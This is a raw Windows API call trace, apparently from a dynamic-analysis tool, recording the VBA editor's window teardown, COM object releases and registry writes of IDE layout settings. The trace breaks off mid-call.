[0218.786] GetLastError () returned 0x0 [0218.786] CExposedDocFile::Release () returned 0x2 [0218.786] CExposedDocFile::Release () returned 0x1 [0218.787] GetSysColor (nIndex=18) returned 0x0 [0218.787] SetTextColor (hdc=0x70109a2, color=0x0) returned 0x0 [0218.787] GetSysColor (nIndex=15) returned 0xf0f0f0 [0218.787] SetBkColor (hdc=0x70109a2, color=0xf0f0f0) returned 0xffffff [0218.787] lstrlenA (lpString="") returned 0 [0218.787] GetTextExtentPoint32A (in: hdc=0x70109a2, lpString="", c=0, psizl=0x18c540 | out: psizl=0x18c540) returned 1 [0218.787] MulDiv (nNumber=17, nNumerator=1, nDenominator=2) returned 9 [0218.787] lstrlenA (lpString="") returned 0 [0218.787] ExtTextOutA (hdc=0x70109a2, x=475, y=14, options=0x0, lprect=0x18c550, lpString="", c=0x0, lpDx=0x0) returned 1 [0218.790] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0218.790] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0218.790] strcpy_s (in: _Dst=0x18c410, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0218.790] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0218.790] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0218.790] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0218.790] SendMessageA (hWnd=0x1020a, Msg=0x1102, wParam=0x1, lParam=0x6a690c0) returned 0x0 [0218.790] GetLastError () returned 0x0 [0218.791] IMalloc:Free (This=0x7feffc15380, pv=0x6c14190) [0218.791] IMalloc:Free (This=0x7feffc15380, pv=0x6889330) [0218.791] IMalloc:Free (This=0x7feffc15380, pv=0x6c6a030) [0218.791] GetCurrentThreadId () returned 0x8c0 [0218.791] SetCursor (hCursor=0x10007) returned 0x10007 [0218.791] CExposedDocFile::Release () returned 0x0 [0218.791] CExposedDocFile::Release () returned 0x0 [0218.791] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a69180) returned 0x6a69120 [0218.791] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x18c920) returned 0x1 [0218.791] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a69120) returned 0x0 [0218.791] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a69120) returned 0x1 [0218.792] SendMessageA (hWnd=0x1020a, Msg=0x1101, wParam=0x0, lParam=0x6a690c0) returned 0x1 [0218.792] SendMessageA (hWnd=0x1020a, Msg=0x1105, wParam=0x0, lParam=0x0) returned 0x0 [0218.792] strcpy_s (in: _Dst=0x18c730, _DstSize=0x208, _Src="No Open Projects" | out: _Dst="No Open Projects") returned 0x0 [0218.792] lstrcpyA (in: lpString1=0x18c520, lpString2="Project" | out: lpString1="Project") returned="Project" [0218.792] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0218.792] lstrcatA (in: lpString1="Project - ", lpString2="No Open Projects" | out: lpString1="Project - No Open Projects") returned="Project - No Open Projects" [0218.792] SetWindowTextA (hWnd=0x10208, lpString="Project - No Open Projects") returned 1 [0218.792] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0218.793] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0218.793] strcpy_s (in: _Dst=0x18c530, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0218.793] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0218.793] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0218.793] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x6c6a260) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x688cb70) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x688cbb0) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x688cbf0) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x688cc30) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x6889230) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f8b0) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x3e62fc0) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x3e63410) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x3e63cb0) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x3e63860) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x3e64100) [0218.793] IMalloc:Free (This=0x7feffc15380, pv=0x6ca8b10) [0218.794] IMalloc:Realloc (This=0x7feffc15380, pv=0x68f4f20, cb=0x0) returned 0x0 [0218.794] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14190 [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c14140) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x68e9580) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x68e94f0) [0218.794] IUnknown:Release (This=0x6a861c0) returned 0x0 [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c6a180) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x69d77a0) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c32790) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x68e94c0) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c322d0) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f790) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c14190) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c13fd0) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c98200) [0218.794] IConnectionPoint:Unadvise (This=0x6a675c0, dwCookie=0x4) returned 0x0 [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x68e9730) [0218.794] IUnknown:Release (This=0x6a675c0) returned 0x1 [0218.794] IConnectionPoint:Unadvise (This=0x6a67500, dwCookie=0x4) returned 0x0 [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x68e95e0) [0218.794] IUnknown:Release (This=0x6a67500) returned 0x1 [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6b0dca0) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6b0dbe0) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6b9f700) [0218.794] IMalloc:Free (This=0x7feffc15380, pv=0x6c14130) [0218.794] wcsncpy_s (in: _Destination=0x18c5b0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0218.794] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0218.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x18c4e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0218.794] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0218.804] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c14150, cb=0x0) returned 0x0 [0218.804] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14150 [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c14180) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x68e9070) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c14170) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x69d7df0) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x68e9460) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c327d0) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6b9fa60) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c14150) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c14160) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6bd3530) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6b0dd60) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c32770) [0218.804] IMalloc:Free (This=0x7feffc15380, pv=0x6c324f0) [0218.805] IMalloc:Free (This=0x7feffc15380, pv=0x6c29a60) [0218.811] SetCursor (hCursor=0x10007) returned 0x10007 [0219.717] lstrcpyA (in: lpString1=0x18c620, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0219.717] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0219.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18c5f0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0219.717] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0219.717] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18c7b0 | out: phkResult=0x18c7b0*=0xa9c) returned 0x0 [0219.717] RegSetValueExA (in: hKey=0xa9c, lpValueName="PropertiesWindow", Reserved=0x0, dwType=0x1, lpData="4 24 180 720 1", cbData=0xf | out: lpData="4 24 180 720 1") returned 0x0 [0220.088] ShowWindow (hWnd=0x1021c, nCmdShow=0) returned 0 [0220.088] ShowWindow (hWnd=0x1021a, nCmdShow=0) returned 0 [0220.088] SendMessageA (hWnd=0x10212, Msg=0x14b, wParam=0x0, lParam=0x0) returned 0x1 [0220.088] SendMessageA (hWnd=0x10218, Msg=0x184, wParam=0x0, lParam=0x0) returned 0x0 [0220.088] SetWindowTextA (hWnd=0x1021c, lpString="") returned 1 [0220.088] SetWindowTextA (hWnd=0x1020e, lpString="Properties") returned 1 [0220.088] GetWindowRect (in: hWnd=0x10216, lpRect=0x18f920 | out: lpRect=0x18f920) returned 1 [0220.088] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x1020e, lpPoints=0x18f920, cPoints=0x2 | out: lpPoints=0x18f920) returned -3080200 [0220.088] GetDC (hWnd=0x1020e) returned 0x70109a2 [0220.088] InflateRect (in: lprc=0x18f910, dx=-1, dy=-1 | out: lprc=0x18f910) returned 1 [0220.088] GetSysColor (nIndex=15) returned 0xf0f0f0 [0220.088] SetBkColor (hdc=0x70109a2, color=0xf0f0f0) returned 0xffffff [0220.088] ExtTextOutA (hdc=0x70109a2, x=2, y=58, options=0x6, lprect=0x18f910, lpString="", c=0x0, lpDx=0x0) returned 1 [0220.089] ReleaseDC (hWnd=0x1020e, hDC=0x70109a2) returned 1 [0220.115] SendMessageA (hWnd=0x101e8, Msg=0x10, wParam=0x0, lParam=0x0) returned 0x0 [0220.115] IsWindow (hWnd=0x10202) returned 1 [0220.115] lstrcpyA (in: lpString1=0x18f4c0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.115] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f490, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.115] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.115] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f650 | out: phkResult=0x18f650*=0x9e0) returned 0x0 [0220.115] RegSetValueExA (in: hKey=0x9e0, lpValueName="MainWindow", Reserved=0x0, dwType=0x1, lpData="0 0 0 0 1", cbData=0xa | out: lpData="0 0 0 0 1") returned 0x0 [0220.116] IsWindow (hWnd=0x10202) returned 1 [0220.116] lstrcpyA (in: lpString1=0x18f4f0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.116] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f4c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.116] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.116] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f680 | out: phkResult=0x18f680*=0x9e0) returned 0x0 [0220.116] RegSetValueExA (in: hKey=0x9e0, lpValueName="MdiMaximized", Reserved=0x0, dwType=0x1, lpData="0", cbData=0x2 | out: lpData="0") returned 0x0 [0220.116] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 1 [0220.116] OffsetRect (in: lprc=0x18f600, dx=8, dy=30 | out: lprc=0x18f600) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f560 | out: lpPoint=0x18f560) returned 1 [0220.117] OffsetRect (in: lprc=0x18f590, dx=8, dy=30 | out: lprc=0x18f590) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f4f0 | out: lpPoint=0x18f4f0) returned 1 [0220.117] OffsetRect (in: lprc=0x18f520, dx=8, dy=30 | out: lprc=0x18f520) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f4f0 | out: lpPoint=0x18f4f0) returned 1 [0220.117] OffsetRect (in: lprc=0x18f520, dx=8, dy=30 | out: lprc=0x18f520) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f560 | out: lpPoint=0x18f560) returned 1 [0220.117] OffsetRect (in: lprc=0x18f590, dx=8, dy=30 | out: lprc=0x18f590) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f4f0 | out: lpPoint=0x18f4f0) returned 1 [0220.117] OffsetRect (in: lprc=0x18f520, dx=8, dy=30 | out: lprc=0x18f520) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f480 | out: lpPoint=0x18f480) returned 1 [0220.117] OffsetRect (in: lprc=0x18f4b0, dx=8, dy=30 | out: lprc=0x18f4b0) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f480 | out: lpPoint=0x18f480) returned 1 [0220.117] OffsetRect (in: lprc=0x18f4b0, dx=8, dy=30 | out: lprc=0x18f4b0) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f4f0 | out: lpPoint=0x18f4f0) returned 1 [0220.117] OffsetRect (in: lprc=0x18f520, dx=8, dy=30 | out: lprc=0x18f520) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f480 | out: lpPoint=0x18f480) returned 1 [0220.117] OffsetRect (in: lprc=0x18f4b0, dx=8, dy=30 | out: lprc=0x18f4b0) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f480 | out: lpPoint=0x18f480) returned 1 [0220.117] OffsetRect (in: lprc=0x18f4b0, dx=8, dy=30 | out: lprc=0x18f4b0) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10202, lpPoint=0x18f480 | out: lpPoint=0x18f480) returned 1 [0220.117] OffsetRect (in: lprc=0x18f4b0, dx=8, dy=30 | out: lprc=0x18f4b0) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10236, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 1 [0220.117] OffsetRect (in: lprc=0x18f600, dx=33, dy=370 | out: lprc=0x18f600) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10236, lpPoint=0x18f560 | out: lpPoint=0x18f560) returned 1 [0220.117] OffsetRect (in: lprc=0x18f590, dx=33, dy=370 | out: lprc=0x18f590) returned 1 [0220.117] ClientToScreen (in: hWnd=0x10236, lpPoint=0x18f560 | out: lpPoint=0x18f560) returned 1 [0220.117] OffsetRect (in: lprc=0x18f590, dx=33, dy=370 | out: lprc=0x18f590) returned 1 [0220.118] ClientToScreen (in: hWnd=0x10236, lpPoint=0x18f560 | out: lpPoint=0x18f560) returned 1 [0220.118] OffsetRect (in: lprc=0x18f590, dx=33, dy=370 | out: lprc=0x18f590) returned 1 [0220.118] ClientToScreen (in: hWnd=0x10238, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 1 [0220.118] OffsetRect (in: lprc=0x18f600, dx=760, dy=129 | out: lprc=0x18f600) returned 1 [0220.118] ClientToScreen (in: hWnd=0x1023a, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 1 [0220.118] OffsetRect (in: lprc=0x18f600, dx=89, dy=560 | out: lprc=0x18f600) returned 1 [0220.118] ClientToScreen (in: hWnd=0x1023c, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 1 [0220.118] OffsetRect (in: lprc=0x18f600, dx=826, dy=188 | out: lprc=0x18f600) returned 1 [0220.118] lstrcpyA (in: lpString1=0x18f570, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.118] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f540, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.118] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.118] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f730 | out: phkResult=0x18f730*=0x9e0) returned 0x0 [0220.119] GetPropA (hWnd=0x10236, lpString="VBAutomation") returned 0x0 [0220.120] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0220.120] CallWindowProcA (lpPrevWndFunc=0xffff020f, hWnd=0x1021a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0220.121] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0220.121] CallWindowProcA (lpPrevWndFunc=0xffff020f, hWnd=0x1021a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0220.121] GetPropA (hWnd=0x1023a, lpString="VBAutomation") returned 0x0 [0220.122] qsort (in: _Base=0x4de8c30, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee448b4e4 | out: _Base=0x4de8c30) [0220.122] _msize (_Block=0x4de8c30) returned 0x1c0 [0220.123] DeleteObject (ho=0x185000f) returned 1 [0220.123] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0220.123] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0220.124] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0220.124] GetPropA (hWnd=0x1023c, lpString="VBAutomation") returned 0x0 [0220.124] RevokeDragDrop (hwnd=0x1020a) returned 0x0 [0220.127] GetPropA (hWnd=0x10238, lpString="VBAutomation") returned 0x0 [0220.128] IsWindow (hWnd=0x10202) returned 1 [0220.135] GetPropA (hWnd=0x10202, lpString="VBAutomation") returned 0x4de2b58 [0220.135] GetPropA (hWnd=0x10202, lpString="VBAutomation") returned 0x4de2b58 [0220.135] RemovePropA (hWnd=0x10202, lpString="VBAutomation") returned 0x4de2b58 [0220.135] PeekMessageA (in: lpMsg=0x18f750, hWnd=0x101e8, wMsgFilterMin=0x1007, wMsgFilterMax=0x1007, wRemoveMsg=0x3 | out: lpMsg=0x18f750) returned 0 [0220.135] DestroyWindow (hWnd=0x101e8) returned 1 [0220.136] lstrcpyA (in: lpString1=0x18f1e0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.136] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f1b0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.136] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.136] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f370 | out: phkResult=0x18f370*=0x9e0) returned 0x0 [0220.136] RegSetValueExA (in: hKey=0x9e0, lpValueName="FolderView", Reserved=0x0, dwType=0x1, lpData="1", cbData=0x2 | out: lpData="1") returned 0x0 [0220.136] CreateStreamOnHGlobal (in: hGlobal=0x6e50088, fDeleteOnRelease=0, ppstm=0x18f440 | out: ppstm=0x18f440*=0x6889170) returned 0x0 [0220.137] lstrlenA (lpString="General") returned 7 [0220.137] IStream:Commit (This=0x6889170, grfCommitFlags=0x274f418) returned 0x0 [0220.137] IStream:Commit (This=0x6889170, grfCommitFlags=0x18f3e0) returned 0x0 [0220.137] IStream:Commit (This=0x6889170, grfCommitFlags=0x274f420) returned 0x0 [0220.137] IStream:Commit (This=0x6889170, grfCommitFlags=0x18f3f0) returned 0x0 [0220.137] IStream:Commit (This=0x6889170, grfCommitFlags=0x18f3f0) returned 0x0 [0220.137] IStream:LockRegion (This=0x6889170, libOffset=0x0, cb=0x2, dwLockType=0x18f458) returned 0x0 [0220.137] GlobalLock (hMem=0x6e50088) returned 0x260c970 [0220.137] lstrcpyA (in: lpString1=0x18f280, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.137] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f250, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.137] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.137] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f448 | out: phkResult=0x18f448*=0x9e0) returned 0x0 [0220.137] RegSetValueExA (in: hKey=0x9e0, lpValueName="Tool", Reserved=0x0, dwType=0x3, lpData=0x260c970*, cbData=0x18 | out: lpData=0x260c970*) returned 0x0 [0220.137] RegCloseKey (hKey=0x9e0) returned 0x0 [0220.137] GlobalUnlock (hMem=0x6e50088) returned 0 [0220.137] IUnknown:Release (This=0x6889170) returned 0x0 [0220.138] IUnknown:Release (This=0x6cb6628) returned 0x0 [0220.138] IUnknown:Release (This=0x6cb64c8) returned 0x0 [0220.138] IUnknown:Release (This=0x6cb6418) returned 0x0 [0220.138] IUnknown:Release (This=0x6cb6788) returned 0x0 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x7 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x6 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x5 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x4 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x3 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x2 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x1 [0220.138] IUnknown:Release (This=0x6cb66d8) returned 0x0 [0220.138] IUnknown:Release (This=0x6cb6578) returned 0x0 [0220.139] IMalloc:Free (This=0x7feffc15380, pv=0x6b85c70) [0220.139] IUnknown:Release (This=0x6cb62b8) returned 0x0 [0220.140] lstrcpyA (in: lpString1=0x18f210, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.140] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f1e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.140] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.140] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f3a0 | out: phkResult=0x18f3a0*=0xa30) returned 0x0 [0220.140] RegSetValueExA (in: hKey=0xa30, lpValueName="CtlsShowSelected", Reserved=0x0, dwType=0x1, lpData="0", cbData=0x2 | out: lpData="0") returned 0x0 [0220.140] lstrcpyA (in: lpString1=0x18f210, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.140] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f1e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.140] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.141] RegOpenKeyA (in: 